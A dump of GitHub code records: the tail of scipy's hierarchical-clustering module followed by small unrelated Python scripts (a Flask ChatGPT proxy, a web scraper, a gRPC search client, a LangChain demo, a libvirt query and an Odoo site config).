generated (i.e., for each row of the linkage\n matrix) what is the maximum distance between any two child clusters.\n\n Due to the nature of hierarchical clustering, in many cases this is going\n to be just the distance between the two child clusters that were merged\n to form the current one - that is, Z[:,2].\n\n However, for non-monotonic cluster assignments such as\n `scipy.cluster.hierarchy.median` clustering this is not always the\n case: There may be cluster formations were the distance between the two\n clusters merged is smaller than the distance between their children.\n\n We can see this in an example:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = median(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n >>> maxdists(Z)\n array([1. , 1. , 1. , 1. , 1.11803399,\n 1.11803399, 1.11803399, 1.11803399, 3. , 3.5 ,\n 3.5 ])\n\n Note that while the distance between the two clusters merged when creating the\n last cluster is 3.25, there are two children (clusters 16 and 17) whose distance\n is larger (3.5). Thus, `scipy.cluster.hierarchy.maxdists` returns 3.5 in\n this case.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n n = Z.shape[0] + 1\n MD = np.zeros((n - 1,))\n Z = np.asarray(Z)\n _hierarchy.get_max_dist_for_each_cluster(Z, MD, int(n))\n MD = xp.asarray(MD)\n return MD\n\n\ndef maxinconsts(Z, R):\n \"\"\"\n Return the maximum inconsistency coefficient for each\n non-singleton cluster and its children.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. See\n `linkage` for more information.\n R : ndarray\n The inconsistency matrix.\n\n Returns\n -------\n MI : ndarray\n A monotonic ``(n-1)``-sized numpy array of doubles.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n inconsistent : for the creation of a inconsistency matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, inconsistent, maxinconsts\n >>> from scipy.spatial.distance import pdist\n\n Given a data set ``X``, we can apply a clustering method to obtain a\n linkage matrix ``Z``. `scipy.cluster.hierarchy.inconsistent` can\n be also used to obtain the inconsistency matrix ``R`` associated to\n this clustering process:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = median(pdist(X))\n >>> R = inconsistent(Z)\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 2. , 12. , 1.11803399, 3. ],\n [ 5. , 13. , 1.11803399, 3. ],\n [ 8. , 15. , 1.11803399, 3. ],\n [11. , 14. , 1.11803399, 3. ],\n [18. , 19. , 3. , 6. ],\n [16. , 17. , 3.5 , 6. ],\n [20. , 21. , 3.25 , 12. ]])\n >>> R\n array([[1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.74535599, 1.08655358, 3. , 1.15470054],\n [1.91202266, 1.37522872, 3. , 1.15470054],\n [3.25 , 0.25 , 3. , 0. ]])\n\n Here, `scipy.cluster.hierarchy.maxinconsts` can be used to compute\n the maximum value of the inconsistency statistic (the last column of\n ``R``) for each non-singleton cluster and its children:\n\n >>> maxinconsts(Z, R)\n array([0. , 0. , 0. , 0. , 0.70710678,\n 0.70710678, 0.70710678, 0.70710678, 1.15470054, 1.15470054,\n 1.15470054])\n\n \"\"\"\n xp = array_namespace(Z, R)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n R = as_xparray(R, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n is_valid_im(R, throw=True, name='R')\n\n n = Z.shape[0] + 1\n if Z.shape[0] != R.shape[0]:\n raise ValueError(\"The inconsistency matrix and linkage matrix each \"\n \"have a different number of rows.\")\n MI = np.zeros((n - 1,))\n Z = np.asarray(Z)\n R = np.asarray(R)\n _hierarchy.get_max_Rfield_for_each_cluster(Z, R, MI, int(n), 3)\n MI = xp.asarray(MI)\n return MI\n\n\ndef maxRstat(Z, R, i):\n \"\"\"\n Return the maximum statistic for each non-singleton cluster and its\n children.\n\n Parameters\n ----------\n Z : array_like\n The hierarchical clustering encoded as a matrix. See `linkage` for more\n information.\n R : array_like\n The inconsistency matrix.\n i : int\n The column of `R` to use as the statistic.\n\n Returns\n -------\n MR : ndarray\n Calculates the maximum statistic for the i'th column of the\n inconsistency matrix `R` for each non-singleton cluster\n node. ``MR[j]`` is the maximum over ``R[Q(j)-n, i]``, where\n ``Q(j)`` the set of all node ids corresponding to nodes below\n and including ``j``.\n\n See Also\n --------\n linkage : for a description of what a linkage matrix is.\n inconsistent : for the creation of a inconsistency matrix.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import median, inconsistent, maxRstat\n >>> from scipy.spatial.distance import pdist\n\n Given a data set ``X``, we can apply a clustering method to obtain a\n linkage matrix ``Z``. `scipy.cluster.hierarchy.inconsistent` can\n be also used to obtain the inconsistency matrix ``R`` associated to\n this clustering process:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = median(pdist(X))\n >>> R = inconsistent(Z)\n >>> R\n array([[1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1. , 0. , 1. , 0. ],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.05901699, 0.08346263, 2. , 0.70710678],\n [1.74535599, 1.08655358, 3. , 1.15470054],\n [1.91202266, 1.37522872, 3. , 1.15470054],\n [3.25 , 0.25 , 3. , 0. ]])\n\n `scipy.cluster.hierarchy.maxRstat` can be used to compute\n the maximum value of each column of ``R``, for each non-singleton\n cluster and its children:\n\n >>> maxRstat(Z, R, 0)\n array([1. , 1. , 1. , 1. , 1.05901699,\n 1.05901699, 1.05901699, 1.05901699, 1.74535599, 1.91202266,\n 3.25 ])\n >>> maxRstat(Z, R, 1)\n array([0. , 0. , 0. , 0. , 0.08346263,\n 0.08346263, 0.08346263, 0.08346263, 1.08655358, 1.37522872,\n 1.37522872])\n >>> maxRstat(Z, R, 3)\n array([0. , 0. , 0. , 0. , 0.70710678,\n 0.70710678, 0.70710678, 0.70710678, 1.15470054, 1.15470054,\n 1.15470054])\n\n \"\"\"\n xp = array_namespace(Z, R)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n R = as_xparray(R, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n is_valid_im(R, throw=True, name='R')\n\n if not isinstance(i, int):\n raise TypeError('The third argument must be an integer.')\n\n if i < 0 or i > 3:\n raise ValueError('i must be an integer between 0 and 3 inclusive.')\n\n if Z.shape[0] != R.shape[0]:\n raise ValueError(\"The inconsistency matrix and linkage matrix each \"\n \"have a different number of rows.\")\n\n n = Z.shape[0] + 1\n MR = np.zeros((n - 1,))\n Z = np.asarray(Z)\n R = np.asarray(R)\n _hierarchy.get_max_Rfield_for_each_cluster(Z, R, MR, int(n), i)\n MR = xp.asarray(MR)\n return MR\n\n\ndef leaders(Z, T):\n \"\"\"\n Return the root nodes in a hierarchical clustering.\n\n Returns the root nodes in a hierarchical clustering corresponding\n to a cut defined by a flat cluster assignment vector ``T``. See\n the ``fcluster`` function for more information on the format of ``T``.\n\n For each flat cluster :math:`j` of the :math:`k` flat clusters\n represented in the n-sized flat cluster assignment vector ``T``,\n this function finds the lowest cluster node :math:`i` in the linkage\n tree Z, such that:\n\n * leaf descendants belong only to flat cluster j\n (i.e., ``T[p]==j`` for all :math:`p` in :math:`S(i)`, where\n :math:`S(i)` is the set of leaf ids of descendant leaf nodes\n with cluster node :math:`i`)\n\n * there does not exist a leaf that is not a descendant with\n :math:`i` that also belongs to cluster :math:`j`\n (i.e., ``T[q]!=j`` for all :math:`q` not in :math:`S(i)`). If\n this condition is violated, ``T`` is not a valid cluster\n assignment vector, and an exception will be thrown.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. See\n `linkage` for more information.\n T : ndarray\n The flat cluster assignment vector.\n\n Returns\n -------\n L : ndarray\n The leader linkage node id's stored as a k-element 1-D array,\n where ``k`` is the number of flat clusters found in ``T``.\n\n ``L[j]=i`` is the linkage cluster node id that is the\n leader of flat cluster with id M[j]. If ``i < n``, ``i``\n corresponds to an original observation, otherwise it\n corresponds to a non-singleton cluster.\n M : ndarray\n The leader linkage node id's stored as a k-element 1-D array, where\n ``k`` is the number of flat clusters found in ``T``. This allows the\n set of flat cluster ids to be any arbitrary set of ``k`` integers.\n\n For example: if ``L[3]=2`` and ``M[3]=8``, the flat cluster with\n id 8's leader is linkage node 2.\n\n See Also\n --------\n fcluster : for the creation of flat cluster assignments.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, fcluster, leaders\n >>> from scipy.spatial.distance import pdist\n\n Given a linkage matrix ``Z`` - obtained after apply a clustering method\n to a dataset ``X`` - and a flat cluster assignment array ``T``:\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n >>> Z\n array([[ 0. , 1. , 1. , 2. ],\n [ 3. , 4. , 1. , 2. ],\n [ 6. , 7. , 1. , 2. ],\n [ 9. , 10. , 1. , 2. ],\n [ 2. , 12. , 1.29099445, 3. ],\n [ 5. , 13. , 1.29099445, 3. ],\n [ 8. , 14. , 1.29099445, 3. ],\n [11. , 15. , 1.29099445, 3. ],\n [16. , 17. , 5.77350269, 6. ],\n [18. , 19. , 5.77350269, 6. ],\n [20. , 21. , 8.16496581, 12. ]])\n\n >>> T = fcluster(Z, 3, criterion='distance')\n >>> T\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n\n `scipy.cluster.hierarchy.leaders` returns the indices of the nodes\n in the dendrogram that are the leaders of each flat cluster:\n\n >>> L, M = leaders(Z, T)\n >>> L\n array([16, 17, 18, 19], dtype=int32)\n\n (remember that indices 0-11 point to the 12 data points in ``X``,\n whereas indices 12-22 point to the 11 rows of ``Z``)\n\n `scipy.cluster.hierarchy.leaders` also returns the indices of\n the flat clusters in ``T``:\n\n >>> M\n array([1, 2, 3, 4], dtype=int32)\n\n \"\"\"\n xp = array_namespace(Z, T)\n Z = as_xparray(Z, order='C', dtype=xp.float64)\n T = as_xparray(T, order='C')\n is_valid_linkage(Z, throw=True, name='Z')\n\n if T.dtype != xp.int32:\n raise TypeError('T must be a 1-D array of dtype int32.')\n\n if T.shape[0] != Z.shape[0] + 1:\n raise ValueError('Mismatch: len(T)!=Z.shape[0] + 1.')\n\n n_clusters = int(xp.unique_values(T).shape[0])\n n_obs = int(Z.shape[0] + 1)\n L = np.zeros(n_clusters, dtype=np.int32)\n M = np.zeros(n_clusters, dtype=np.int32)\n Z = np.asarray(Z)\n T = np.asarray(T, dtype=np.int32)\n s = _hierarchy.leaders(Z, T, L, M, n_clusters, n_obs)\n if s >= 0:\n raise ValueError(('T is not a valid assignment vector. Error found '\n 'when examining linkage node %d (< 2n-1).') % s)\n L, M = xp.asarray(L), xp.asarray(M)\n return (L, M)\n","repo_name":"scipy/scipy","sub_path":"scipy/cluster/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":145002,"program_lang":"python","lang":"en","doc_type":"code","stars":11925,"dataset":"github-code","pt":"57"} +{"seq_id":"16769087451","text":"#chat-gptの値をhtmlに受け渡す仕組み作る\n\nfrom flask import *\nimport requests\n\napp = Flask(__name__)\n\nvariable = \"Hello, World!\"\napp.secret_key = 'api_key'\n\n# チャットGPTに質問する関数\ndef query_chatgpt(prompt, apiKey):\n header = {\n \"Content-Type\" : \"application/json\",\n \"Authorization\" : f\"Bearer {apiKey}\",\n }\n\n body = '''\n {\n \"model\": \"gpt-3.5-turbo\",\n \"messages\": [\n {\"role\": \"user\", \"content\":\"''' + prompt + '''\"}\n ]\n }\n '''\n response = requests.post(\"https://api.openai.com/v1/chat/completions\", headers = header, data = body.encode('utf_8'))\n rj = response.json()\n return rj[\"choices\"][0][\"message\"][\"content\"]\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html', placeholder=\"OPENAIのAPIKEYを入れてください\", value=\"登録\")\n\n@app.route(\"/\", methods=[\"POST\"])\ndef api():\n session[\"apiKey\"] = request.form[\"apiKey\"]\n return render_template(\"index.html\",placeholder=session[\"apiKey\"],value=\"登録済\")\n\n@app.route('/get_variable', methods=[\"POST\"])\ndef get_variable():\n apiKey = session[\"apiKey\"]\n message = request.json.get('message')\n prompt = message\n ans = query_chatgpt(prompt, apiKey)\n return jsonify({'variable': ans})\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"konegi/frontend","sub_path":"gpt.py","file_name":"gpt.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"2253527340","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef crawl(keyWord):\n input_list = []\n regex = re.compile(r'[\\r\\n\\t]')\n for i in range(1, 11):\n url = \"https://www.fonfood.com/s/\" + keyWord + \"/\" + str(i)\n response = requests.get(url)\n soup = BeautifulSoup(response.text , 'html.parser')\n articles = soup.findAll('div' , {'class':'storeListItem '})\n for article in articles:\n meta = article.find('a')\n address = article.find('p').get_text()\n address = regex.sub('', address)\n input_list.append((meta['title'], address))\n return input_list\n\nwhile True:\n\tinputStr = input()\n\tdata = crawl(inputStr)\n\tprint(data)\n\t#title = meta.get_text().strip()\n","repo_name":"oscarada87/coding365","sub_path":"telegramBot/pickLunch/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10688224220","text":"from math import factorial\ndef backtrack(x, idx):\n global temp\n if idx == len(s):\n temp += 1\n if temp == n:\n return x\n else:\n for i in s:\n if i not in x:\n ret = backtrack(x + i, idx + 1)\n if ret:\n return ret\n return None\nwhile True:\n try:\n temp = 0\n s, n = input().split()\n n = int(n)\n if factorial(len(s)) < n:\n print(f'{s} {n} = No permutation')\n else:\n print(f'{s} {n} =', backtrack('', 0))\n except EOFError:\n break\n","repo_name":"jongpark1234/Baekjoon","sub_path":"09000/baekjoon_9742.py","file_name":"baekjoon_9742.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"71221654579","text":"import search_pb2 as pb2\r\nimport search_pb2_grpc as pb2_grpc\r\nimport grpc\r\nimport redis\r\nimport json\r\nfrom searchform import ProductSearchForm\r\nfrom flask import Flask, jsonify, flash, render_template, request, redirect\r\nimport sys\r\napp = Flask(__name__)\r\n\r\n\r\nclass SearchClient(object):\r\n \"\"\"\r\n Client for gRPC functionality\r\n \"\"\"\r\n\r\n def __init__(self):\r\n self.host = 'localhost'\r\n self.server_port = 50051\r\n\r\n # instantiate a channel\r\n self.channel = grpc.insecure_channel(\r\n '{}:{}'.format(self.host, self.server_port))\r\n\r\n # bind the client and the server\r\n self.stub = pb2_grpc.SearchStub(self.channel)\r\n\r\n def get_url(self, message):\r\n \"\"\"\r\n Client function to call the rpc for GetServerResponse\r\n \"\"\"\r\n message = pb2.Message(message=message)\r\n print(f'{message}')\r\n return self.stub.GetServerResponse(message)\r\n\r\n\r\nr = redis.Redis(host='localhost', port=6379, db=0)\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n search = ProductSearchForm(request.form)\r\n if request.method == 'POST':\r\n return getProduct(search)\r\n return render_template('index.html', form=search)\r\n\r\n\r\n@app.route('/results')\r\ndef getProduct(search):\r\n\r\n r = redis.Redis(host='localhost', port=6379, db=0)\r\n\r\n search_string = search.data['search']\r\n # print(search_string)\r\n search_results = search_string.lower()\r\n results = []\r\n\r\n value = r.get(f'results: {search_results}')\r\n if value:\r\n print(f'La búsqueda de {search_results} se encontró en cache.')\r\n result = value.decode()\r\n results = result.replace(\"[\", \"\")\r\n result = results.replace(\"]\", \"\")\r\n results = result.split(\"'{\")\r\n final = []\r\n for i in results:\r\n result = i.replace(\"}',\", \"\")\r\n final.append(result)\r\n return jsonify({'resultados': final})\r\n #result = jsonify({'resultados': result})\r\n # return result\r\n else:\r\n print(f'La búsqueda de {search_results} no se encontró en cache.')\r\n client = SearchClient()\r\n result = client.get_url(search_results)\r\n # print(len(result.product))\r\n if (len(result.product) > 0):\r\n for i in result.product:\r\n res = \"{\" + f'id: \"{str(i.id).strip()}\",' + f'brand_name: \"{str(i.brand_name).strip()}\",' + f'items_description: \"{str(i.items_description).strip()}\",' + \\\r\n f'prices: \"{str(i.prices).strip()}\",' + \\\r\n f'category: \"{str(i.category).strip()}\"' + \"}\"\r\n results.append(res)\r\n r.set(f'results: {search_results}', str(results))\r\n return jsonify({'resultados': results})\r\n\r\n return \"No se encontraron resultados.\"\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, port=50051)\r\n","repo_name":"Lineamingu/SisDis-022021","sub_path":"Tarea1/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74251642098","text":"import sys\n\nimport common\n\nimport ROOT\n\nROOT.gStyle.SetLabelSize(0.05, 'X')\nROOT.gStyle.SetLabelSize(0.05, 'Y')\nROOT.gStyle.SetNumberContours(128)\nROOT.gStyle.SetPalette(ROOT.kTemperatureMap)\nROOT.gStyle.SetPaintTextFormat('.3f')\n\nsource = ROOT.TFile.Open(sys.argv[1])\nfitres = source.Get('fit_mdf')\npars = fitres.floatParsFinal()\n\nobs = sys.argv[2]\noutname = sys.argv[3]\n\nnpoi = len(common.binnames[obs])\n\nmatrix = ROOT.TH2D('correlation', '', npoi, 0., float(npoi), npoi, 0., float(npoi))\n\npois = []\nfor ip in range(npoi):\n poi = pars[pars.index('r_%d' % ip)]\n\n pois.append(poi)\n\n matrix.GetXaxis().SetBinLabel(ip + 1, '#mu_{%s}' % common.bintitles[obs][ip])\n matrix.GetYaxis().SetBinLabel(ip + 1, '#mu_{%s}' % common.bintitles[obs][ip])\n\nfor ip1 in range(npoi):\n for ip2 in range(npoi):\n matrix.SetBinContent(ip1 + 1, ip2 + 1, fitres.correlation(pois[ip1], pois[ip2]))\n\nmatrix.SetMaximum(1.)\nmatrix.SetMinimum(-1.)\nmatrix.SetMarkerSize(1.5)\n\ncanvas = ROOT.TCanvas('c1', 'c1', 600, 600)\ncanvas.SetLeftMargin(0.15)\ncanvas.SetBottomMargin(0.12)\ncanvas.SetTopMargin(0.08)\ncanvas.SetRightMargin(0.05)\nmatrix.Draw('COL TEXT')\n\ncmsLabel = common.makeCMS(prelim=True, out=True)\nlumiLabel = common.makeLumi(137.)\ncmsLabel.Draw()\nlumiLabel.Draw()\n\ncanvas.Print(outname)\n","repo_name":"latinos/PlotsConfigurations","sub_path":"Configurations/Differential/tools/plotting/plot_correlation_matrix.py","file_name":"plot_correlation_matrix.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"14650142174","text":"\"\"\"Number spiral diagonals\n\nStarting with the number 1 and moving to the right in a clockwise\ndirection a 5 by 5 spiral is formed as follows:\n\n 21 22 23 24 25\n 20 7 8 9 10\n 19 6 1 2 11\n 18 5 4 3 12\n 17 16 15 14 13\n\nIt can be verified that the sum of the numbers on the diagonals is 101.\n\nWhat is the sum of the numbers on the diagonals in a 1001 by 1001 spiral\nformed in the same way?\n\nAnswer: 669171001\n\"\"\"\n\n\ndef solve():\n UPPER_BOUND = 1002\n sumValue = 1\n for i in range(3, UPPER_BOUND, 2):\n value = i * i\n red = i - 1\n for _ in range(4):\n sumValue += value\n value -= red\n\n return sumValue\n\n\nif __name__ == '__main__':\n print(solve())\n","repo_name":"yhlam/project-euler","sub_path":"project_euler/p028.py","file_name":"p028.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1599496877","text":"from langchain.llms import LlamaCpp\nfrom langchain.callbacks.manager import CallbackManager\nfrom langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.document_loaders import OnlinePDFLoader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import Chroma\n\n\nn_gpu_layers = 1 # Metal set to 1 is enough.\nn_batch = 512 # Should be between 1 and n_ctx, consider the amount of RAM of your Apple Silicon Chip.\ncallback_manager = CallbackManager([StreamingStdOutCallbackHandler()])\n\n# Make sure the model path is correct for your system!\nllm = LlamaCpp(\n model_path=\"/Users/anyangpeng/Documents/DataScience/LLM/llama2ccp/llama-2-13b.ggmlv3.q5_0.bin\",\n n_gpu_layers=n_gpu_layers,\n n_batch=n_batch,\n n_ctx=2048,\n f16_kv=True, # MUST set to True, otherwise you will run into problem after a couple of calls\n callback_manager=callback_manager,\n verbose=False,\n)\n\n# Load the document, split it into chunks, embed each chunk and load it into the vector store.\nraw_documents = OnlinePDFLoader('llm/chatdev.pdf').load()\ntext_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\ndocuments = text_splitter.split_documents(raw_documents)\ndb = Chroma.from_documents(documents, HuggingFaceEmbeddings(model_name=\"all-MiniLM-L6-v2\"))\n\nquery = \"What is the average cost in software production\"\ndocs = db.similarity_search(query)\nprint(docs[0].page_content)","repo_name":"anyangp/llm","sub_path":"rag/retrieval_augmented_generation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"37669494429","text":"'''\n\nExample 11. Using getCellsFreeMemory\n\nThis example demonstrates the getCellsFreeMemory() method.\nIt can be used to obtain the amount of free memory in bytes\nin some or all of the NUMA nodes in the system.\n\n'''\n\nimport sys\nimport libvirt\n\nuri = 'qemu:///system'\nconn = libvirt.open(uri)\nif conn is None:\n print(f\"Failed to open connection to {uri}\", file=sys.stderr)\n exit(1)\n\nnodeinfo = conn.getInfo()\nnumnodes = nodeinfo[4]\n\nmemlist = conn.getCellsFreeMemory(0, numnodes)\ncell = 0\nfor cellfreemem in memlist:\n print(f'Node {cell}: {cellfreemem} bytes free')\n cell += 1\n\nconn.close()\nexit(0)\n","repo_name":"almacro/snippets","sub_path":"python/libvirt/basic/using_getCellsFreeMemory.py","file_name":"using_getCellsFreeMemory.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15204411419","text":"from backend.config import MarineConfig\nfrom backend.app.cma.crud import MarineMonitorCRUD\nfrom backend.utils.notification import Email\n\n\nclass MonitorService(MarineConfig):\n \"\"\"\n 监控的一些逻辑处理相关的方法\n \"\"\"\n\n def __init__(self):\n super(MonitorService, self).__init__()\n\n def send_monitor_info_email(self, monitor_info_item):\n \"\"\"\n 发送监控邮件\n :param monitor_info_item:\n :return:\n \"\"\"\n monitor_crud = MarineMonitorCRUD()\n resp = monitor_crud.get_monitor_info_by_item(\n monitor_time=monitor_info_item.monitor_time,\n monitor_type=monitor_info_item.monitor_type,\n )\n if resp:\n print(\"监控邮件发送过\")\n return False\n else:\n print(\"监控邮件未发送\")\n email = Email(\n mail_from=self.config[\"mail_from\"],\n mail_to=self.config[\"mail_to\"],\n mail_key=self.config[\"mail_key\"],\n )\n subject = f\"{monitor_info_item.monitor_time} 舱位情况通知\"\n content = (\n f\"监控到有如下航线情况可以下单,情根据实际情况操作:\\n\"\n f\"

类型:{monitor_info_item.monitor_type}

\"\n f\"

装货港:{monitor_info_item.port_of_loading}

\"\n f\"

卸货港:{monitor_info_item.port_of_discharge}

\"\n f\"

线路详情:{monitor_info_item.container_detail}

\"\n )\n\n return email.send(subject, content)\n","repo_name":"binbinah/marineConsole","sub_path":"backend/app/cma/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"26454499829","text":"presettest = {\n # ---------------- marker ----------------\n# \"\"\"\n# some nice description of the project\n# \"\"\"\n \"presettest\": {\n 'site_name': 'presettest',\n 'servername': 'presettest',\n 'erp_admin_pw': '',\n 'erp_version': '10.0',\n # servertype is odoo or flectra\n 'erp_provider': 'odoo',\n 'db_name': 'presettest',\n # inherits tells from what other site we want to inherit values\n 'inherit': '',\n # should we use demodata\n 'without_demo': 'all',\n # pg_version to use with dumper\n # 'pg_version' : '--cluster 10/main',\n 'site_settings': {\n # proto is either http:// or https://\n # it is used to construct the web.base.url\n # if not set, the base url will be left untouched\n 'proto': 'http://',\n 'configs': {\n 'website_config': {\n 'model': \"website.config.settings\",\n 'website_name': 'Your Sitenmae',\n # needs recaptcha installed\n # 'site_key' : 'xx',\n # 'secret_key' : 'x',\n },\n # the following sample values assume, that the module support branding is installed\n 'support_branding': {\n 'model': 'ir.config_parameter',\n 'config_parameter_company_name': 'Your company',\n 'config_parameter_company_url': 'https://yourwebsite.com',\n 'config_parameter_company_color': '#000',\n 'config_parameter_support_email': 'support@yourwebsite.com',\n 'config_parameter_release': 42,\n },\n },\n 'server_config': {\n # override values to be set in the server config file\n # the defaul values that can be manipulated from this stanza are set\n # in templates/openerp_cfg_defaults.py\n # 'workers' : 4,\n },\n 'site_settings': {\n # data to bes set on the remote server with\n # --set-site-data\n 'company_data': {\n # use any number of fields you want to set on the main company\n # this is normaly done after after all modules are installed\n # so you can also use fields like firstname/lastname that are\n # only available after the addons have been installed\n 'name': 'acme & co',\n 'street': 'the street 007',\n 'zip': '12345',\n 'city': 'The City',\n 'phone': 'the phone number',\n },\n 'users': {\n # add users you want to be created\n # for each user provide either an string with the email,\n # or a dictionary with more data. In any case, the email must\n # be provided\n # the same rules as for the company apply\n 'testuser': 'test_user@presettest.ch',\n 'otheruser': {\n 'email': 'otheruserpresettest.ch',\n 'city': 'otherusers city',\n # ...\n },\n },\n # what languaes to load, the first one will be the default language\n # unless the language is an empty string\n 'languages': [], # ['de_CH', 'fr_CH']\n },\n 'local_settings': {\n # these are values that are set, when we run bin/c with the\n # -SL --set-local-data option\n # candiates to set are:\n # admin emai (pw is allready set to 'admin')\n # base url ..\n 'base_url': 'http://localhost:8069',\n 'admin_mail': 'robert@redo2oo.ch',\n 'addons': {\n 'install': [],\n # unistall is not yet implemented\n 'uninstall': []\n },\n 'site_settings': {\n 'configs': {\n 'ir.config_parameter': {\n 'records': [\n # list of (search-key-name, value), {'field' : value, 'field' : value ..}\n [('key', 'support_branding.company_name'),\n {'value': 'redO2oo KLG'}],\n ],\n },\n },\n },\n },\n },\n 'email_settings': {\n 'smtp_server': '',\n 'email_server_incomming': '',\n 'email_user_incomming': '',\n 'email_pw_incomming': '',\n 'email_userver_outgoing': '',\n 'email_user_outgoing': '',\n 'email_pw_outgoing': '',\n },\n 'remote_server': {\n 'remote_url': 'localhost', # please adapt\n 'remote_data_path': '/root/erp_workbench',\n 'remote_user': 'root',\n # where is sites home on the remote server for non root users\n 'remote_sites_home': '/home/robert/erp_workbench',\n 'redirect_emil_to': '', # redirect all outgoing mail to this account\n # needs red_override_email_recipients installed\n },\n 'docker': {\n 'base_image': 'robertredcor/presettest:10.0-latest',\n 'odoo_image_version': 'odoo:10.0',\n 'container_name': 'presettest',\n # 'db_container_name' : 'db', # needs only to be set if it is not 'db'\n # trough what port can we access oddo (mapped to 8069)\n 'odoo_port': '??',\n # trough what port can we access odoos long polling port (mapped to 8072)\n 'odoo_longpoll': '??',\n # within the the container the user odoo has a user and group id that\n # is used to access the files in the log and filestore volumes\n 'external_user_group_id': '104:107',\n # hub_name is the name to use to store our own images\n 'hub_name': 'docker_hub',\n # ODOO_BASE_URL\n # If this variable is set, the `ir.config_parameter` `web.base.url`\n # will be automatically set to this domain when the container\n # starts. `web.base.url.freeze` will be set to `True`.\n 'ODOO_BASE_URL': 'https://www.presettest.ch'\n },\n # docker_hub is used to store images we build ourself\n # by default we use dockers own docker_hub, but could\n # provide our own\n 'docker_hub': {\n # 'docker_hub' : {\n # 'user' : 'robertredcor',\n # 'docker_hub_pw' : '',\n # }\n },\n 'apache': {\n 'vservername': 'www.presettest.ch',\n # 'vserveraliases': ['presettest.ch',],\n },\n # path to the letsencrypt structure\n 